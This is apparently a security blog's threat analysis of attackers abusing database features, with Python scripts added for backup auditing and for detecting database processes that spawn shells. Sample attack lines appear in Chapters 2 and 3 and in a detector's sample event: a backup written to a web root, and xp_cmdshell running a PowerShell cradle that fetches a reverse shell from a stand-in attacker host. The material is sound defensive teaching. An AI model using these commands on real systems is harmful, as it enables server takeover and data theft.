TRUST IS A VULNERABILITY: Analyzing the Attack Wave Compromising Databases with Legitimate Commands

 

🛡️ THREAT ANALYSIS • LIVING OFF THE LAND

   
By CyberDudeBivash • October 09, 2025 • CISO Briefing
 
cyberdudebivash.com | cyberbivash.blogspot.com
 
 

 

Disclosure: This is a strategic analysis for security and IT professionals. It contains affiliate links to relevant enterprise security solutions. Your support helps fund our independent research.

 

Chapter 1: The New Insider Threat — When Your Database Becomes the Attacker

 

A new wave of sophisticated attacks is targeting the heart of the enterprise: the database. But these attackers aren't just running `SELECT * FROM users`. They are "Living Off the Land" *inside* your data layer. Once they gain a foothold—often via a stolen credential or a simple SQL injection—they are abusing your database's own trusted, legitimate, and powerful administrative features to conduct stealthy data exfiltration and achieve full remote code execution on the underlying server. This TTP is incredibly difficult to detect because, to many security tools, the database is just doing its job. The trusted process has become the attack vector.


 

Chapter 2: TTP #1 — Weaponizing Backup Utilities for Mass Data Exfiltration

 

One of the simplest and most effective techniques is the abuse of native backup commands.

The Attack:

An attacker with privileged access to a SQL database can execute a standard backup command, but with a malicious twist. They direct the output of the full database backup to a file in a web-accessible directory, such as the web server's root.

```sql
BACKUP DATABASE customer_data TO DISK = 'C:\inetpub\wwwroot\backup.bak';
```

The attacker can then simply use their web browser to navigate to `http://victim.com/backup.bak` and download the entire multi-gigabyte database. To a file integrity monitor or a basic security tool, the database server just performed a normal, authorized backup operation.
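The backup abuse described above leaves a record: on SQL Server, `msdb.dbo.backupset` stores the database name and the login that ran each backup, and `msdb.dbo.backupmediafamily` stores the physical destination, so the destination path can be audited after the fact. The script below is an added example, not code from the original post, that runs that audit over rows shaped like the result of joining those two tables. It flags a backup when its destination is inside a web-served directory, when it is outside the approved backup location, or when it was issued by an account that is not a backup operator. The sample rows, the web-root list, the approved backup directory and the operator account are all constructed for the example, and the path check generalizes the page's Windows case to POSIX paths as well.

```python
"""Audit database backup history for backups written to suspicious destinations.

Added example, not part of the original post. The sample rows below are
constructed; they are shaped like the result of this SQL Server query:

    SELECT bs.database_name, bs.user_name, bmf.physical_device_name
    FROM msdb.dbo.backupset AS bs
    JOIN msdb.dbo.backupmediafamily AS bmf ON bs.media_set_id = bmf.media_set_id;
"""
from __future__ import annotations

from pathlib import PurePosixPath, PureWindowsPath

# Hypothetical site policy (constructed for the example; tune to your estate).
APPROVED_BACKUP_ROOTS = [r"D:\SQLBackups", "/var/backups/db"]
WEB_ROOTS = [r"C:\inetpub\wwwroot", "/var/www"]   # directories a web server serves directly
BACKUP_OPERATORS = {r"CORP\svc_sqlbackup"}        # accounts expected to run backups

# Constructed backup-history rows: one expected backup, one to the web root, one to a share.
SAMPLE_BACKUP_HISTORY = [
    {"database_name": "customer_data", "user_name": r"CORP\svc_sqlbackup",
     "physical_device_name": r"D:\SQLBackups\customer_data_full.bak"},
    {"database_name": "customer_data", "user_name": r"CORP\svc_webapp",
     "physical_device_name": r"C:\inetpub\wwwroot\backup.bak"},
    {"database_name": "orders", "user_name": r"CORP\dba_jane",
     "physical_device_name": r"\\fileshare01\dump\orders.bak"},
]


def _parts(path: str, windows: bool) -> list[str]:
    """Split a path into components; Windows paths compare case-insensitively."""
    if windows:
        return [part.lower() for part in PureWindowsPath(path).parts]
    return list(PurePosixPath(path).parts)


def is_under(path: str, root: str) -> bool:
    """True if `path` names a file inside directory `root` (same path flavour only)."""
    windows = "\\" in path or (len(path) > 1 and path[1] == ":")
    p, r = _parts(path, windows), _parts(root, windows)
    return len(p) > len(r) and p[: len(r)] == r


def classify_backup(row: dict) -> list[str]:
    """Return the reasons a backup record needs investigation (empty list = expected)."""
    dest = row["physical_device_name"]
    reasons = []
    if any(is_under(dest, web) for web in WEB_ROOTS):
        reasons.append("destination is inside a web-served directory (downloadable over HTTP)")
    if not any(is_under(dest, ok) for ok in APPROVED_BACKUP_ROOTS):
        reasons.append("destination is outside the approved backup location")
    if row["user_name"] not in BACKUP_OPERATORS:
        reasons.append(f"issued by {row['user_name']}, which is not a backup operator account")
    return reasons


def audit_backup_history(rows: list[dict]) -> list[tuple[dict, list[str]]]:
    """Return every row that triggered at least one reason, paired with its reasons."""
    flagged = []
    for row in rows:
        reasons = classify_backup(row)
        if reasons:
            flagged.append((row, reasons))
    return flagged


if __name__ == "__main__":
    for row, reasons in audit_backup_history(SAMPLE_BACKUP_HISTORY):
        print(f"{row['database_name']} -> {row['physical_device_name']}")
        for reason in reasons:
            print(f"    - {reason}")
```

Run as a script it prints the two flagged rows with their reasons; the first row passes all three checks and is silent. The destination check is the strongest of the three because it does not depend on knowing who the attacker is: a `.bak` file landing under the web root is wrong regardless of which login wrote it. The same query can be scheduled as a recurring hunt, since a backup to the web root is a one-off event that a periodic sweep of `backupset` will still catch after the file has been downloaded and deleted.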


 

Chapter 3: TTP #2 — Abusing Native Functions for OS-Level Code Execution

 

An even more dangerous technique is the abuse of built-in functions that allow the database to interact with the underlying operating system.

The Attack:

Many databases, like Microsoft SQL Server, include powerful (and dangerous) stored procedures like `xp_cmdshell`. This is a legitimate feature that allows a DBA to execute OS commands from a SQL query. If an attacker gains `sysadmin` rights on the database, they can use this feature to get a shell on the server.

```sql
EXEC xp_cmdshell 'powershell -c "iex(new-object net.webclient).downloadstring(''http://attacker.com/revshell.ps1'')"'
```

This command, executed by the trusted `sqlservr.exe` process, will download and run a reverse shell, giving the attacker a full system compromise. This is the ultimate **Living Off the Land** technique.


 

Chapter 4: The Defender's Playbook — A Guide to Hardening and Detection

 

Defending against these attacks requires a shift from signature-based prevention to behavioral detection and a strict adherence to the Principle of Least Privilege.

1. Enforce Least Privilege

This is your most critical defense. The service accounts used by your web applications should **NEVER** have administrative, backup, or command execution privileges. Their permissions should be scoped down to the absolute minimum required (e.g., only `SELECT`, `INSERT`, `UPDATE` on specific tables).

2. Harden Your Database Configuration

Disable dangerous features like `xp_cmdshell` unless there is an overwhelming and documented business need. If they are required, their usage must be strictly controlled and heavily audited.

3. Hunt for the Behavior (The Golden Signal)

You must hunt for the anomalous behavior. Your database process (`sqlservr.exe`, `postgres.exe`, etc.) should **NEVER** be the parent of a command shell (`cmd.exe`, `powershell.exe`, `/bin/sh`) or a network utility (`curl`, `wget`). This is a definitive "golden signal" of compromise that only a modern EDR can reliably detect.
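The parent-child rule from step 3, and the `xp_cmdshell` chain from Chapter 3, as an added example that is not code from the original post: a small scanner over constructed process-creation events that raises a finding whenever a database engine binary is the parent of a shell or of `curl`/`wget`, and escalates the severity when the command line carries the download-and-execute pattern shown in Chapter 3. The events use the field names Sysmon records for process creation (`ParentImage`, `Image`, `CommandLine`, `User`), but the records, file paths and account names are constructed, and the process lists extend the page's with `pwsh.exe`, `bash` and `mysqld` as an assumption to tune for your estate. `xp_cmdshell` runs its argument through a Windows command shell, so the child of `sqlservr.exe` is `cmd.exe`, which is what the first sample event models.

```python
"""Flag database engine processes that spawn shells or network utilities.

Added example, not part of the original post. Events are constructed JSON
lines using the Sysmon process-creation (Event ID 1) field names; any EDR or
audit source that records parent and child image paths maps onto the same fields.
"""
from __future__ import annotations

import json
from pathlib import PurePosixPath, PureWindowsPath

# Database engine binaries that should never have a shell as a child (assumed list).
DB_PROCESSES = {"sqlservr.exe", "postgres.exe", "postgres", "mysqld.exe", "mysqld"}
# Child images the page calls out, plus pwsh/bash as the obvious equivalents.
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "sh", "bash"}
NET_TOOLS = {"curl", "curl.exe", "wget"}
# Command-line fragments of the download-and-execute pattern shown in Chapter 3.
CRADLE_MARKERS = ("downloadstring", "iex(", "net.webclient", "invoke-expression")

# Constructed events: xp_cmdshell chain, a user's own PowerShell, a postgres->sh
# spawn on Linux, and the conhost helper that SQL Server's cmd.exe child brings up.
SAMPLE_EVENTS_JSONL = r"""
{"EventID": 1, "User": "NT Service\\MSSQLSERVER", "ParentImage": "C:\\Program Files\\Microsoft SQL Server\\MSSQL15.MSSQLSERVER\\MSSQL\\Binn\\sqlservr.exe", "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /c powershell -c \"iex(new-object net.webclient).downloadstring('http://attacker.example/revshell.ps1')\""}
{"EventID": 1, "User": "CORP\\jdoe", "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe"}
{"EventID": 1, "User": "postgres", "ParentImage": "/usr/lib/postgresql/15/bin/postgres", "Image": "/bin/sh", "CommandLine": "sh -c id"}
{"EventID": 1, "User": "NT Service\\MSSQLSERVER", "ParentImage": "C:\\Program Files\\Microsoft SQL Server\\MSSQL15.MSSQLSERVER\\MSSQL\\Binn\\sqlservr.exe", "Image": "C:\\Windows\\System32\\conhost.exe", "CommandLine": "conhost.exe"}
"""


def image_name(image_path: str) -> str:
    """Lower-cased file name of an image path, handling both path flavours."""
    if "\\" in image_path:
        return PureWindowsPath(image_path).name.lower()
    return PurePosixPath(image_path).name.lower()


def evaluate_event(event: dict) -> dict | None:
    """Return a finding if a database engine spawned a shell or network tool, else None."""
    parent = image_name(event.get("ParentImage", ""))
    child = image_name(event.get("Image", ""))
    if parent not in DB_PROCESSES:
        return None
    if child in SHELLS:
        kind = "shell"
    elif child in NET_TOOLS:
        kind = "network utility"
    else:
        return None  # e.g. conhost.exe or another helper the engine legitimately starts
    command = event.get("CommandLine", "").lower()
    cradle = any(marker in command for marker in CRADLE_MARKERS)
    return {
        "severity": "critical" if cradle else "high",
        "parent": parent,
        "child": child,
        "kind": kind,
        "user": event.get("User", ""),
        "command": event.get("CommandLine", ""),
        "note": "download cradle in command line" if cradle else f"database engine spawned a {kind}",
    }


def scan_process_events(jsonl: str) -> list[dict]:
    """Run evaluate_event over every non-empty JSON line and collect the findings."""
    findings = []
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        finding = evaluate_event(json.loads(line))
        if finding:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for finding in scan_process_events(SAMPLE_EVENTS_JSONL):
        print(f"[{finding['severity'].upper()}] {finding['parent']} -> {finding['child']} "
              f"as {finding['user']}: {finding['note']}")
```

Run as a script it reports the `sqlservr.exe` to `cmd.exe` event as critical and the `postgres` to `sh` event as high, and stays quiet on the user's own PowerShell and on `conhost.exe`. When tuning this on a SQL Server host, keep `sqlservr.exe` and `SQLAGENT.EXE` separate: command steps in Agent jobs are started by the Agent service, not the engine, so an allowlist for the Agent does not need to loosen the rule for the engine itself.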

Detect the Anomalous Behavior: A modern **XDR platform** is essential for detecting these evasive LoTL techniques. It can see that your trusted database process is behaving maliciously and automatically terminate the attack chain.
 

Explore the CyberDudeBivash Ecosystem

Our Core Services:

• CISO Advisory & Strategic Consulting
• Penetration Testing & Red Teaming
• Digital Forensics & Incident Response (DFIR)
• Advanced Malware & Threat Analysis
• Supply Chain & DevSecOps Audits

About the Author

   

CyberDudeBivash is a cybersecurity strategist with 15+ years in threat hunting, incident response, and database security, advising CISOs across APAC. [Last Updated: October 09, 2025]

 

  #CyberDudeBivash #DatabaseSecurity #LivingOffTheLand #ThreatHunting #CyberSecurity #InfoSec #ThreatIntel #CISO #EDR
